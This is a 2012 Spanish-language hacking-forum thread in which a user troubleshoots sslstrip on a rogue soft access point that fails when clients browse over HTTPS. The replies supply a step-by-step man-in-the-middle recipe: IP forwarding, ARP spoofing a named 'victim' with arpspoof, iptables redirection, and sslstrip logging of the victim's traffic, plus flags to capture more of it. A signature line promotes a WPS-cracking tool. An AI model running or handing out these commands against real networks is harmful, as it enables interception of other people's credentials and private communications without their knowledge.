elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  fallo con sslstrip		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: fallo con sslstrip  (Leído 2,106 veces)
Socomate

Desconectado Desconectado

Mensajes: 2


Ver Perfil
fallo con sslstrip
« en: 26 Febrero 2012, 05:32 am »
Hola pongo esto en este foro porque lo estoy haciendo para un softAP y todo funciona de manera normal para los clientes conectados al softAP salvo cuando un cliente está navegando con https: que la navegación web es imposible, la regla que controla el tráfico https es:

sudo iptables --table nat --append PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8181

y en otro terminal tengo:
sudo sslstrip -a -l 8181 -w dump_sslstrip -k -f

cuando el navegador del cliente se dirige a una página con https habilitado el navegador devuelve un mensaje tipo: "ha sido imposible realizar la conexión" y el fichero dump_sslstrip está vacío.



¿Alguien puede darme alguna pista?
En línea
P4nd3m0n1um


Desconectado Desconectado

Mensajes: 1.419



Ver Perfil
Re: fallo con sslstrip
« Respuesta #1 en: 28 Febrero 2012, 02:03 am »
yo lo use una ves pero con ettercap.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

según tengo en un manual.

después puedes guiarte también de aquí.
En línea
WPSCrackGUI v1.2.4 (10-02-2013): Interfaz gráfica para el crackeo de redes WPS con Reaver.
Envía tu PIN y Mejora WPSCrackGUI. Adicionalmente Buscar tu PIN ONLINE!
adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: fallo con sslstrip
« Respuesta #2 en: 28 Febrero 2012, 11:28 am »
Por un lado, en la regla de IPTABLES que estas definiendo necesitas especificar la interfaz de red que estas usando (wlan0, quizas?) debes indicarla sea cual sea la etiqueta que tenga.
Por otro lado intenta especificar las opciones "-s" (para tracear todas las peticiones usando SSL  para y desde el servidor web) y si sigues sin tener logs, intenta la opción "-a" (para tracear todas las peticiones usando SSL o HTTP para y desde el servidor web)
En línea
http://twitter.com/jdaanial
http://thehackerway.com/

Cursos de hacking avanzado - THW Academy http://academy.thehackerway.com
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas Sslstrip « 1 2 »
Hacking 		gerard_88 16 18,613 Último mensaje 10 Mayo 2011, 12:14 pm
por joinko
sslstrip en windows
Redes 		NikNitro! 2 10,974 Último mensaje 28 Enero 2011, 12:00 pm
por madpitbull_99
problemas con sslstrip
Hacking 		beholdthe 0 2,433 Último mensaje 23 Enero 2010, 20:28 pm
por beholdthe
Ettercap+Sslstrip « 1 2 »
Hacking 		Goshin 17 21,056 Último mensaje 25 Septiembre 2010, 21:45 pm
por PyrOS-9889
SSLSTRIP « 1 2 3 »
Hacking 		BeLGaRioN 20 13,951 Último mensaje 9 Diciembre 2011, 11:33 am
por D_pit_88
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines